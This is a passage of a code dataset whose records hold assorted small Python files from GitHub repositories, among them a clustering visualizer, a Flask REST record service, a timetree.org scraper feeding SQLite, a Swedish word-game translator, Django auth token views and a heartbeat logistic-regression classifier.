a\n\n return new_A\n\n\ndef similarity(u: np.ndarray, v: np.ndarray):\n return -((u - v) ** 2).sum()\n\n\ndef create_matrices(X: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray]:\n S = np.zeros((X.shape[0], X.shape[0]))\n R = np.array(S)\n A = np.array(S)\n\n for i in range(X.shape[0]):\n for j in range(X.shape[0]):\n S[i, j] = similarity(X[i], X[j])\n\n return A, R, S\n\n\ndef give_preferences(\n S: np.ndarray, preference: Any = \"median\"\n) -> Tuple[np.ndarray, int]:\n if preference == \"median\":\n indices = np.where(~np.eye(S.shape[0], dtype=bool))\n m = np.median(S[indices])\n elif type(preference) == np.ndarray:\n m = preference\n else:\n try:\n m = float(preference)\n except ValueError:\n raise ValueError(\n \"Parameter 'preference' must either be 'median', a np.ndarray or a scalar.\"\n )\n\n np.fill_diagonal(S, m)\n return S, m\n\n\ndef affinity_prop(\n X: np.ndarray,\n maxiter: int = 100,\n preference: Any = \"median\",\n damping_factor: float = 0.5,\n local_thresh: int = 10,\n data_plot=None,\n fig=None,\n ax=None,\n c: st.empty = None,\n):\n \"\"\"\n Params:\n X: Input matrix with data to cluster.\n maxiter: Maximum iterations after which to stop the clustering if it\n does not converge before.\n preference: Either 'median' (default), a vector of the same size as the input data,\n or a fixed scalar value. Determines the initial \"preferences\", i.e., self-similarities:\n values on the diagonal of the similarity matrix. Details in the README.\n damping_factor: Damping factor used to calculate new availabilities and\n responsibilities. Acts as weight for the weighted sum of\n the old and new availabilities or responsibilities.\n local_thresh: Number of iterations without any change in the outcome labels before the algorithm stops.\n data_plot: If not None, a function that takes a figure and axes as input and plots the data.\n fig: If not None, the figure to plot the data on.\n ax: If not None, the axes to plot the data on.\n c: If not None, the container to print logs on.\n \"\"\"\n\n X = np.asarray(X)\n A, R, S = create_matrices(X)\n S, p = give_preferences(S, preference=preference)\n log = \"\"\n log += f\"Initial preferences: {p} \\n \"\n\n count_equal = 0\n i = 0\n converged = False\n\n for i in stqdm(range(maxiter), st_container=st.sidebar):\n c.write(log)\n E_old = R + A\n labels_old = np.argmax(E_old, axis=1)\n R = compute_responsibility(S, R, A, damping_factor=damping_factor)\n A = compute_availability(R, A, damping_factor=damping_factor)\n E_new = R + A\n labels_cur = np.argmax(E_new, axis=1)\n\n if i % 5 == 0:\n exemplars = plot_iteration_n_get_exemplars(\n X, labels_cur, data_plot, fig, ax, c\n )\n log += f\"Iteration {i}: found {len(exemplars)} exemplars \\n \"\n\n if np.all(labels_cur == labels_old):\n count_equal += 1\n else:\n count_equal = 0\n\n if count_equal > local_thresh:\n converged = True\n break\n\n if converged:\n log += f\"Converged after {i} iterations. \\n \"\n else:\n log += f\"Did not converge after {i} iterations. \\n \"\n c.write(log)\n\n E = R + A\n plot_iteration_n_get_exemplars(X, labels_cur, data_plot, fig, ax, c)\n labels = np.argmax(E, axis=1)\n exemplars = np.unique(labels)\n centers = X[exemplars]\n c.write(log + f\"{len(exemplars)} exemplars found.\")\n\n return exemplars, labels, centers\n\n\ndef plot_iteration_n_get_exemplars(\n data: np.ndarray, labels, data_plot=None, fig=None, ax: plt.Axes = None, c=None\n) -> np.ndarray:\n exemplars = np.unique(labels)\n colors = dict(zip(exemplars, cycle(\"bgrcmyk\")))\n ax.clear()\n for i in range(len(labels)):\n if i in exemplars:\n exemplar = i\n edge = \"k\"\n ms = 10\n else:\n exemplar = labels[i]\n ms = 3\n edge = None\n ax.plot(\n [data[i][0], data[exemplar][0]],\n [data[i][1], data[exemplar][1]],\n c=colors[exemplar],\n )\n ax.plot(\n data[i][0],\n data[i][1],\n \"o\",\n c=colors[exemplar],\n markersize=ms,\n markeredgecolor=edge,\n )\n data_plot.pyplot(fig)\n return exemplars\n","repo_name":"sk1tter/affinity-propagation-visualization","sub_path":"affinity_propagation.py","file_name":"affinity_propagation.py","file_ext":"py","file_size_in_byte":6545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36112958694","text":"from typing import Dict, List\r\nfrom pandas import DataFrame\r\nfrom DataI.Models.TableModel import TableModel\r\n\r\n\r\nclass FileSaver():\r\n fullFilePath = str\r\n\r\n def __init__(self, fullFilePath):\r\n self.fullFilePath = fullFilePath\r\n\r\n @classmethod\r\n def tableToDataFrameConverter(cls, table: TableModel) -> DataFrame:\r\n return DataFrame(cls.__getTableAsListOfRows(table), columns=cls.__getColumnsNames(table))\r\n\r\n @classmethod\r\n def __getTableAsListOfRows(cls, table: TableModel) ->List[list]:\r\n rowsCount = len(table.columns[0].cells)\r\n tableList = list()\r\n for i in range(rowsCount):\r\n bufferRowList = list()\r\n for j in range(len(table.columns)):\r\n bufferRowList.append(table.columns[j].cells[i].value)\r\n tableList.append(bufferRowList)\r\n\r\n return tableList[1:]\r\n\r\n @classmethod\r\n def __getColumnsNames(cls, table: TableModel) -> List[str]:\r\n names = list()\r\n for column in table.columns:\r\n names.append(column.name)\r\n return names\r\n\r\n\r\n\r\n","repo_name":"presenters-group/DataI","sub_path":"API/DataI/Controllers/FileSaver/FileSaver.py","file_name":"FileSaver.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39016945507","text":"nums = [ 2,7,11,15 ]\ntarget = 9\n\ndef two_sum(arr,sum):\n for i in range(len(arr)):\n for j in range(i+1,len(arr)):\n if arr[i]+arr[j]==sum:\n return(i,j)\n\nprint(two_sum(nums,target))","repo_name":"PragmatechEducation/LeetCode-Top-Interview-Questions","sub_path":"TwoSum-Python.py","file_name":"TwoSum-Python.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30866385479","text":"class Solution:\n def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\n dp = [[0] * (n + 1) for i in range(m + 1)]\n for s in strs:\n zero_count = one_count = 0\n for c in s:\n if c == '0':\n zero_count += 1\n else:\n one_count += 1\n for zeroes in range(m, zero_count - 1, -1):\n for ones in range(n, one_count - 1, -1):\n dp[zeroes][ones] = max(1 + dp[zeroes - zero_count][ones - one_count], dp[zeroes][ones])\n return dp[m][n]\n\n ","repo_name":"Maxwell-Yang-2001/maxwell-yang-leetcode","sub_path":"474-ones-and-zeroes/474-ones-and-zeroes.py","file_name":"474-ones-and-zeroes.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13998597819","text":"\r\nfrom requests import get, utils\r\nfrom decimal import Decimal\r\n\r\ndef currency_rates(char_code):\r\n response = get('http://www.cbr.ru/scripts/XML_daily.asp')\r\n encodings = utils.get_encoding_from_headers(response.headers)\r\n server_date = response.headers['Set-Cookie'].split(',')[1]\r\n print(f'Дата сервера: {server_date}')\r\n\r\n content = response.content.decode(encoding=encodings)\r\n\r\n currency_dict = {}\r\n for n in content.split(''): # Находим код валюты и её значение\r\n i = n.split('')[0][-3:]\r\n currency_dict[i] = n[-7:] if i.isalpha() else None # Создаем список с валютой и её стоимостью\r\n\r\n char_code = char_code.upper()\r\n if currency_dict.setdefault(char_code) == None:\r\n print('Неверный код валюты')\r\n else: #Если ключ есть в списке выдаём значение валюты\r\n price = Decimal(currency_dict[char_code].replace(',', '.')).quantize(Decimal('0.01'))\r\n print(f'{char_code} = {price} руб.')\r\n\r\ncurrency_rates(input('Введите валюту в формате (USD,usd):'))\r\n","repo_name":"nail14/GeekBrains_DZ","sub_path":"home work/DZ_4/DZ_4_2.py","file_name":"DZ_4_2.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11097435602","text":"from flask import Flask, jsonify, request\nfrom argparse import ArgumentParser\nimport json\nimport threading\nimport sys\n\napp = Flask(__name__)\nRECORDS = []\nRECORD_LOCK = threading.Lock()\n\n\n@app.route('/simpleservice/api/v1.0/status', methods=['GET'])\ndef get_status():\n \"\"\"clients can use this method to see if service alive and kicking\"\"\"\n return \"OK\" # defaults to a 200 HTML status return code\n\n\n# standard URL for a REST API\n@app.route('/simpleservice/api/v1.0/shutdown', methods=['POST'])\ndef shutdown():\n \"\"\"clean method to shutdown down flask/web server\"\"\"\n shutdown_func = request.environ.get(\n 'werkzeug.server.shutdown') # default web server with flask\n if shutdown_func is None:\n return 'unable to shutdown server!', 501\n shutdown_func()\n return \"server shutting down...\"\n\n\n# can also handle all methods in a single\n@app.route('/simpleservice/api/v1.0/record', methods=['GET'])\n# handler ['GET', 'POST, 'PUT', DELETE' ]\ndef get_records():\n \"\"\"get a list of all dictionary records and return as a JSON file\"\"\"\n with RECORD_LOCK: # since flask 1.0 multi-threaded is enabled by default\n return jsonify(RECORDS)\n\n\n@app.route('/simpleservice/api/v1.0/record/', methods=['GET'])\ndef get_record_by_name(name):\n \"\"\"uses construct in route to pass a record parameter to route handler\"\"\"\n with RECORD_LOCK:\n # return list of matches or []\n return jsonify([r for r in RECORDS if r.get('name') == name])\n\n\n@app.route('/simpleservice/api/v1.0/record', methods=['POST'])\ndef add_record():\n \"\"\"add a record to the global structure\"\"\"\n if 'json' not in request.files:\n # use an HTML record that seems appropriate\n return \"no json file in the request!\", 400\n try:\n # can't assume that JSON file is valid\n _record = json.loads(request.files['json'].read())\n except ValueError:\n return \"failed to parse JSON file correctly!\", 400\n if type(_record) is not dict or 'name' not in _record:\n return \"expecting a dictionary with identifier, post failed!\", 400\n with RECORD_LOCK:\n # just check if the name already exists in the global RECORD list\n if len([r for r in RECORDS if r.get('name') == _record['name']]):\n return \"already in the records!\", 409\n RECORDS.append(_record)\n return \"OK\"\n\n\n@app.route('/simpleservice/api/v1.0/record', methods=['PUT'])\ndef update_record():\n \"\"\"route that updates an existing record - expects a JSON file as input\"\"\"\n if 'json' not in request.files:\n return \"no json file in the request!\", 400\n try:\n _record = json.loads(request.files['json'].read())\n except ValueError:\n return \"failed to parse JSON file correctly!\", 400\n if type(_record) is not dict or 'name' not in _record:\n return \"expecting a dictionary with a name, post failed!\", 400\n with RECORD_LOCK:\n for _index, _rec in enumerate(RECORDS):\n if _rec['name'] == _record['name']:\n RECORDS[_index] = _record\n return \"OK\"\n return \"Failed to update record!\", 500\n\n\n@app.route('/simpleservice/api/v1.0/record', methods=['DELETE'])\ndef remove_record():\n \"\"\"route that removes a record from the global structure\"\"\"\n # could use .../record/ in URL or as in this case as an argument .../record?name=bob\n if 'name' not in request.args:\n return \"need a name to delete a record!\", 400\n with RECORD_LOCK:\n if len([r for r in RECORDS if r.get('name') == request.args.get('name')]) == 0:\n return \"no such record found!\", 409\n RECORDS[:] = [r for r in RECORDS if r.get( # copy all but name matches\n 'name') != request.args.get('name')]\n return \"OK\"\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('-e', '--external',\n dest='external',\n action='store_true',\n help=\"run as external server\")\n parser.add_argument('-p', '--port',\n type=int,\n default=5000,\n help=\"port number to use\")\n args = parser.parse_args()\n if args.external:\n # service can be accessed from an external PC\n app.run(debug=False, host='0.0.0.0', port=args.port)\n else:\n # available on localhost e.g. 127.0.0.1\n app.run(debug=True, port=args.port)\n sys.exit(0)\n","repo_name":"duckherder/simple-flask-rest-api","sub_path":"simpleservice.py","file_name":"simpleservice.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34332654740","text":"import requests\nimport time\nimport sqlite3\nfrom lxml import html\n\n\ndef getElem(bacteria):\n url = \"http://www.timetree.org/ajax/name/timeline/\" + bacteria + \"?select_tag_id=timeline-resolve-target\"\n content = requests.get(url).text\n tree = html.fromstring(content)\n num = tree.xpath(\"//div/div/select/option/@value\")[0]\n\n url2 = \"http://www.timetree.org/ajax/timeline/\" + num + \"?taxon=\" + bacteria + \"&selected=\" + num\n content2 = requests.get(url2).text\n tree2 = html.fromstring(content2)\n values = tree2.xpath(\"//svg[7]/text/text()\")\n final_value = [(values[i], values[i + int(len(values) / 2)]) for i in range(int(len(values) / 2)) if\n values[i + int(len(values) / 2)] != '0']\n return final_value\n\n\nstart = time.time()\ncommon_dict = {}\nf = open(\"spisok.txt\", \"r\")\nlst = [(line.strip()).split(\" \")[0] for line in f]\nlst = set(map(lambda x: x if ord(x[0]) != 12 else x[1:], filter(lambda el: len(el) > 1, lst)))\nprint(len(lst))\nfor bact in lst:\n try:\n common_dict[bact] = getElem(bact)\n except IndexError:\n continue\nf.close()\n\nconn = sqlite3.connect('bacteries.db')\nc = conn.cursor()\nc.execute('''CREATE TABLE if not exists taxons(id INTEGER PRIMARY KEY AUTOINCREMENT, name CHAR(30) NOT NULL, UNIQUE(name))''')\nc.execute('CREATE INDEX bact_name on taxons(name)')\nc.execute('''CREATE TABLE if not exists divergence (first_id INTEGER, second_id INTEGER, diverg INTEGER,\n FOREIGN KEY (first_id) REFERENCES taxons(id), FOREIGN KEY (second_id) REFERENCES taxons(id),\n PRIMARY KEY (first_id, second_id))''')\n\nfor key in common_dict:\n c.execute(\"SELECT * FROM taxons WHERE name = (?)\", (key,))\n if not c.fetchone():\n c.execute(\"INSERT INTO taxons (name) VALUES (?)\", (key,))\n for values in common_dict[key]:\n c.execute(\"SELECT * FROM taxons WHERE name = (?)\", (values[0],))\n if not c.fetchone():\n c.execute(\"INSERT INTO taxons (name) VALUES (?)\", (values[0],))\n\nfor key in common_dict:\n for name, date in common_dict[key]:\n c.execute(\"SELECT id FROM taxons WHERE name=?\", (key,))\n child_id = c.fetchone()[0]\n c.execute(\"SELECT id FROM taxons WHERE name=?\", (name,))\n parent_id = c.fetchone()[0]\n c.execute('''INSERT INTO divergence (first_id, second_id, diverg) VALUES\n (?, ?, ?)''', (child_id, parent_id, date,))\n\nconn.commit()\nconn.close()\nend = time.time()\nprint(\"{0:.2f} seconds\".format(end - start))","repo_name":"liquidbrainisstrain/ouroboros","sub_path":"old_tools/bact.py","file_name":"bact.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74021654632","text":"import os\nimport unittest\nfrom pyparsing import ParseException\nfrom server.parser import RobotLanguage\n\ncurrent_path = os.path.split(os.path.realpath(__file__))[0]\n\n\nclass TestRobotLanguage(unittest.TestCase):\n def test_parse_files(self):\n with open(os.path.join(current_path, \"parser/result1.txt\"), \"r\") as f:\n result = f.readline().strip()\n self.assertEqual(repr(RobotLanguage.parse_files([os.path.join(current_path, \"parser/case1.txt\")])), result)\n with open(os.path.join(current_path, \"parser/result2.txt\"), \"r\") as f:\n result = f.readline().strip()\n self.assertEqual(repr(RobotLanguage.parse_files([os.path.join(current_path, \"parser/case2.txt\")])), result)\n with self.assertRaises(ParseException):\n RobotLanguage.parse_files([os.path.join(current_path, \"parser/case3.txt\")]),\n with self.assertRaises(ParseException):\n RobotLanguage.parse_files([os.path.join(current_path, \"parser/case4.txt\")]),\n with self.assertRaises(ParseException):\n RobotLanguage.parse_files([os.path.join(current_path, \"parser/case5.txt\")]),\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"xqmmcqs/robot-DSL","sub_path":"test/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"23484412155","text":"# EXERCISE 43 VIDEO GAME - BMR version\r\nimport bmr_ex43_scenes\r\nfrom sys import exit\r\n\r\n\r\nclass Engine(object):\r\n def __init__(self, scene_map):\r\n self.scene_map = scene_map # an instance of Map(object) !!!\r\n\r\n def play(self):\r\n current_scene = self.scene_map.opening_scene()\r\n last_scene = self.scene_map.next_scene('finished')\r\n\r\n while current_scene != last_scene:\r\n next_scene_name = current_scene.enter()\r\n current_scene = self.scene_map.next_scene(next_scene_name)\r\n \r\n current_scene.enter()\r\n\r\nclass Map(object):\r\n\r\n scenes = {\r\n 'dark_forest': bmr_ex43_scenes.DarkForest() ,\r\n 'the_river': bmr_ex43_scenes.TheRiver() ,\r\n 'death': bmr_ex43_scenes.Death() ,\r\n 'finished': bmr_ex43_scenes.Finished()\r\n }\r\n\r\n def __init__(self, start_scene):\r\n self.start_scene = start_scene\r\n\r\n def next_scene(self, scene_name):\r\n val = Map.scenes.get(scene_name)\r\n return val\r\n\r\n def opening_scene(self):\r\n return self.next_scene(self.start_scene)\r\n\r\na_map = Map('dark_forest')\r\na_game = Engine(a_map)\r\na_game.play()\r\n\r\n\r\n","repo_name":"uwl-python-ig/lp3thw","sub_path":"ex43/bmr_ex43_main.py","file_name":"bmr_ex43_main.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22234412194","text":"#!/usr/bin/env python\n\nimport argparse\n\nconsonants = \"bcdfghjklmnpqrstvwxzBCDFGHJKLMNPQRSTVWZ\"\nvowels = \"aeiouyåäöAEIOUYÅÄÖ\"\nstring = \"Vad kul Python programmering är\"\nrovarstring = \"VoVadod kokulol PoPytothohonon poprorogogroramommomerorinongog äror\"\n\n\n# Stjärnspråket: en stjärna läggs till efter varje bokstav.\n# \"Stjärna\" blir S*t*j*ä*r*n*a.\n# Här har vi dock ändrat koden litet till en modul rubrik.\ndef stjarnsprak(lanuage):\n print(\"\".join(\n l + '*' # Lägg till en stjärna efter aktuell bokstav.\n # Kolla om aktuell bokstav är med i våra definierade strängar...\n if l in consonants\n or l in vowels\n else l # Annars ersätter vi med ett frågettecken.\n for l in lanuage))\n\n\n# Viskspråket: alla vokaler tas bort.\n# Om man matar in \"kor\" blir det k + ' ' + r = \"k r\".\ndef visksprak(lanuage):\n print(\"Viskspråket: \" + \"\".join(\n ' ' # Mellanslag ersätter aktuell vokal.\n if l in vowels # Kolla om aktuell bokstav är en vokal.\n else l # Annars lägg bara till akuell bokstav till den nya strängen.\n for l in lanuage) # Loopa igenom alla inmatade bokstäver och gör ovan tills texten är slut.\n + \"\\n\")\n\n\n# Rövarspråket: alla konsonanter fördubblas och 'o' stoppas in emellan.\n# \"kor\" blir k + (o + k) + o + r + (o + r) = \"kokoror\".\ndef rovarsprak(lanuage):\n print(\"\".join(\n # Lägg till o efter aktuell bokstav och lägg even till en kopia av bokstaven efter o.\n l + 'o' + l\n if l in consonants # Kolla om aktuell bokstav är en konsonant.\n else l # Annars lägg bara till akuell bokstav till den nya strängen.\n for l in lanuage) # Loopa igenom alla inmatade bokstäver och gör ovan tills texten är slut.\n + \"\\n\")\n\n\n# Rövarspråket: alla konsonanter fördubblas och 'o' stoppas in emellan.\n# Denna funktion där bort vokalen och dubbletten av varje funnen konsonant, vid varje loop.\ndef svenskarovarsprak(language):\n # translation = \"\"\n for i in range(0, len(language)):\n if i < len(language) and language[i] in consonants:\n language = language[:i] + language[i + 2:]\n # translation = language[:i + 1]\n # range tar hela aktuella input strängen. Strängen förkortas genom slice.\n # Vi ser först till att undvika string index out of range error genom att se till att i är\n # mindre än aktuella inputsträngens längd. Sedan kollar vi om det är en konsonant.\n # Sen gör vi en slice för att ta med alla tecken från början av inkommande rövarspråkssträng, fram till och med i.\n # Vi gör en ny slice för att bli av med en vokal och följande konsonant.\n # Vi sätter sen ihop rövarspråksträngen ingen, nu med minskad längd vilket påverkar\n # range i for loopen. Vi behöver inte translation variabeln men den kan användas under debugging\n # för att se hur itereringen fungerar.\n\n print(\"Översättning till Svenska från Rövarspråket: \" + language + \"\\n\")\n\n\n# Bebisar säger bara första stavelsen i varje ord men de säger den tre gånger:\n# En stavelse är alla tecken i ett ord fram till och med första vokalen.\ndef bebissprak(language):\n translation = \"\"\n cut_letters = \"\"\n for l in language.split():\n for i in range(0, len(l)):\n if i < len(l) and l[i] in vowels:\n cut_letters = l[:i + 1] * 3\n translation += cut_letters + \" \"\n break\n print(\"Bebisspråket: \" + translation + \"\\n\")\n\n\n# För varje ord: bokstäverna före första vokalen sätts sist och \"all\" läggs till på slutet.\ndef allspraket(language):\n translation = \"\"\n cut_consonants = \"\"\n all = \"all\"\n for l in language.split():\n for i in range(0, len(l)):\n if i < len(l) and l[i] in vowels:\n cut_consonants = l[:i]\n translation += l[i:] + cut_consonants + all + \" \"\n break\n\n print(\"Allspråket: \" + translation + \"\\n\")\n\n\n# Ordet kuperas som i allspråket fast efter första vokalen. \"fi\" sätts först och \"kon\" sist.\ndef fikonspraket(language):\n translation = \"\"\n cut_letters = \"\"\n fi = \"fi\"\n kon = \"kon\"\n for l in language.split():\n for i in range(0, len(l)):\n if i < len(l) and l[i] in vowels:\n cut_letters = l[:i + 1]\n translation += fi + l[i + 1:] + cut_letters + kon + \" \"\n break\n print(\"Fikonspråket: \" + translation + \"\\n\")\n\n\ndef bash(file, sprak):\n translation = \"\"\n\n with open(file) as filein:\n for line in filein:\n translation += line\n\n if sprak == \"ST\":\n stjarnsprak(translation)\n elif sprak == \"R\":\n rovarsprak(translation)\n elif sprak == \"S\":\n svenskarovarsprak(translation)\n elif sprak == \"B\":\n bebissprak(translation)\n elif sprak == \"A\":\n allspraket(translation)\n elif sprak == \"F\":\n fikonspraket(translation)\n elif sprak == \"V\":\n visksprak(translation)\n\n\ndef main():\n # Lägger till args\n parser = argparse.ArgumentParser(description=\"Odd Languages\")\n parser.add_argument(\n \"file\", help=\"Choose a file for translation: --file FILE\", type=str)\n parser.add_argument(\"--st\", help=\"Star Language --st ST\", type=str)\n parser.add_argument(\"--r\", help=\"Robber's language --r R\", type=str)\n parser.add_argument(\"--s\", help=\"Robber's To Swedish --s S\", type=str)\n parser.add_argument(\"--b\", help=\"Baby Language --b B\", type=str)\n parser.add_argument(\"--a\", help=\"All Language --a A\", type=str)\n parser.add_argument(\"--f\", help=\"Fig Language --f F\", type=str)\n parser.add_argument(\"--v\", help=\"Whisper Language --v V\", type=str)\n parser.add_argument(\"--lang\", help=\"Choose language for one line translation: St Ro Sv Be Al Fi LANG\\n\" +\n \" WHEN YOU USE ECHO: echo |.filename.py 'text to be translated' --spraak 'Ro' \")\n args = parser.parse_args()\n\n # Filöversättning\n if args.file != \"\":\n file = args.file\n if args.st == \"ST\":\n bash(file, \"ST\")\n if args.r == \"R\":\n bash(file, \"R\")\n if args.s == \"S\":\n bash(file, \"S\")\n if args.b == \"B\":\n bash(file, \"B\")\n if args.a == \"A\":\n bash(file, \"A\")\n if args.f == \"F\":\n bash(file, \"F\")\n if args.v == \"V\":\n bash(file, \"V\")\n\n # En rads översättning\n if args.lang == \"St\":\n stjarnsprak(file)\n if args.lang == \"Ro\":\n rovarsprak(file)\n if args.lang == \"Sv\":\n svenskarovarsprak(file)\n if args.lang == \"Be\":\n bebissprak(file)\n if args.lang == \"Al\":\n allspraket(file)\n if args.lang == \"Fi\":\n fikonspraket(file)\n if args.lang == \"Vi\":\n visksprak(file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JonnyWDeveloper/Python_Traduce_Robbers_Language","sub_path":"sprak.py","file_name":"sprak.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24908051618","text":"from django.contrib.auth import login\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.throttling import AnonRateThrottle\nfrom rest_framework.views import APIView\n\n\nclass SustainedAnon(AnonRateThrottle):\n rate = \"100/day\"\n\n\nclass BurstAnon(AnonRateThrottle):\n rate = \"5/minute\"\n\n\nclass HawcObtainAuthToken(ObtainAuthToken):\n throttle_classes = (BurstAnon, SustainedAnon)\n\n\nhawc_obtain_auth_token = HawcObtainAuthToken.as_view()\n\n\nclass HawcValidateAuthToken(APIView):\n throttle_classes = (BurstAnon, SustainedAnon)\n permission_classes = [IsAuthenticated]\n\n def get(self, request, format=None):\n if \"login\" in request.query_params:\n login(request, request.user)\n return Response({\"valid\": True})\n","repo_name":"shapiromatron/hawc","sub_path":"hawc/apps/myuser/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"21022548370","text":"from app import app\nfrom flask import jsonify\nfrom flask import request\nfrom tempfile import TemporaryFile\n\nimport pandas as pd\nimport numpy as np\nimport csv\n\nfrom scipy.io import loadmat\nfrom scipy.optimize import minimize\n\nfrom datetime import datetime\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return \"Hello, World!\"\n\n\ndef sigmoid(z):\n\treturn (1 / (1 + np.exp(-z)))\n\ndef lrcostFunctionReg(theta, X, y, reg, return_grad=False):\n\tm = y.size\n\th = sigmoid(X.dot(theta))\n\t\n\tJ = -1*(1/m)*(np.log(h).T.dot(y)+np.log(1-h).T.dot(1-y)) + (reg/(2*m))*np.sum(np.square(theta[1:]))\n\t\n\tif np.isnan(J[0]):\n\t\treturn(np.inf)\n\treturn (J[0])\n\ndef cost(theta, X, y, learningRate): \n\ttheta = np.matrix(theta)\n\tX = np.matrix(X)\n\ty = np.matrix(y)\n\tfirst = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n\tsecond = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))\n\treg = (learningRate / 2 * len(X)) * np.sum(np.power(theta[:,1:theta.shape[1]], 2))\n\treturn np.sum(first - second) / (len(X)) + reg\n\ndef gradient_with_loop(theta, X, y, learningRate): \n theta = np.matrix(theta)\n X = np.matrix(X)\n y = np.matrix(y)\n\n parameters = int(theta.ravel().shape[1])\n grad = np.zeros(parameters)\n\n error = sigmoid(X * theta.T) - y\n\n for i in range(parameters):\n term = np.multiply(error, X[:,i])\n\n if (i == 0):\n grad[i] = np.sum(term) / len(X)\n else:\n grad[i] = (np.sum(term) / len(X)) + ((learningRate / len(X)) * theta[:,i])\n\n return grad\n\ndef gradient(theta, X, y, learningRate): \n\ttheta = np.matrix(theta)\n\tX = np.matrix(X)\n\ty = np.matrix(y)\n\n\tparameters = int(theta.ravel().shape[1])\n\terror = sigmoid(X * theta.T) - y\n\n\tgrad = ((X.T * error) / len(X)).T + ((learningRate / len(X)) * theta)\n\n\t# intercept gradient is not regularized\n\tgrad[0, 0] = np.sum(np.multiply(error, X[:,0])) / len(X)\n\n\tresult = np.array(grad).ravel()\n\n\treturn result\n\ndef oneVsAll(X, y, num_labels, lambda_reg):\n\tm, n = X.shape\n\tall_theta = np.zeros((num_labels, n + 1))\n\tX = np.column_stack((np.ones((m,1)), X))\n\n\tfor c in xrange(num_labels):\n\t\t# initial theta for c/class\n\t\tinitial_theta = np.zeros((n + 1, 1))\n\t\tprint(\"Training {:d} out of {:d} categories...\".format(c+1, num_labels))\n\t\tmyargs = (X, (y%10==c).astype(int), lambda_reg, True)\n\t\ttheta = minimize(lrcostFunctionReg, x0=initial_theta, args=myargs, options={'disp': True, 'maxiter':13}, method=\"Newton-CG\", jac=True)\n\t\tall_theta[c,:] = theta[\"x\"]\n\n\treturn all_theta\n\ndef one_vs_all(features, classes, n_labels, reg):\n\trows = features.shape[0]\n\tparams = features.shape[1]\n\tall_theta = np.zeros((n_labels, params + 1))\n\tX = np.insert(features, 0, values=np.ones(rows), axis=1) \n\n\tfor i in range(1, n_labels + 1):\n\t\ttheta = np.zeros(params + 1)\n\t\ty_i = np.array([1 if label == i else 0 for label in classes])\n\t\ty_i = np.reshape(y_i, (rows, 1))\n\t\tfmin = minimize(fun=cost, x0=theta, args=(X, y_i, reg), method='TNC', jac=gradient_with_loop)\n\t\tall_theta[i-1,:] = fmin.x\n\n\treturn all_theta\n\ndef predict_all(X, all_theta): \n\trows = X.shape[0]\n\tparams = X.shape[1]\n\tnum_labels = all_theta.shape[0]\n\n\tX = np.insert(X, 0, values=np.ones(rows), axis=1)\n\tX = np.matrix(X)\n\tall_theta = np.matrix(all_theta)\n\n\th = sigmoid(X * all_theta.T)\n\n\th_argmax = np.argmax(h, axis=1)\n\th_argmax = h_argmax + 1\n\n\treturn h_argmax\n\ndef getY():\n\twith open('app/training-results.csv', 'r') as csvfile:\n\t\tspamreader = csv.reader(csvfile)\n\t\tresult = []\n\t\tfor row in spamreader:\n\t\t\tscenario = int(row[0])\n\t\t\tresult.append([scenario])\n\n\treturn np.asarray(result)\n\nepoch = datetime.utcfromtimestamp(0)\ndef unix_time_millis(dt):\n\treturn (dt - epoch).total_seconds() * 1000.0\n\ndef getX():\n\twith open('app/heartbeat-training.csv', 'r') as csvfile:\n\t\tspamreader = csv.reader(csvfile)\n\t\tresult = []\n\t\tfor row in spamreader:\n\t\t\tdata_row = []\n\t\t\tfor idx, val in enumerate(row):\n\t\t\t\tif idx == 4:\n\t\t\t\t\tdata_row.append(float(row[idx]))\n\t\t\t\telif idx == 5 or idx == 6:\n\t\t\t\t\ttimes = datetime.strptime(row[idx], '%Y-%m-%d %H:%M:%S')\n\t\t\t\t\tdata_row.append(unix_time_millis(times))\n\t\t\t\telif idx >= 7 and idx <= 16:\n\t\t\t\t\tdata_row.append(float(row[idx]))\n\t\t\t\telse:\n\t\t\t\t\tdata_row.append(float(row[idx]))\n\n\t\t\tresult.append(data_row)\n\n\tdata = np.array(result, dtype=np.float128)\n\n\treturn np.c_[np.ones((data.shape[0],1)), data]\n\n\n# defined scenarios\n# 0 - resting\n# 1 - sleeping\n# 3 - exercising\n# 4 - overdose\n@app.route('/scenarios', methods = ['POST'])\ndef scenarios():\n\ty = getY()\n\tX = getX()\n\n\t# Add constant for intercept\n\tX = np.c_[np.ones((X.shape[0],1)), X]\n\n\tprint('X: {} (with 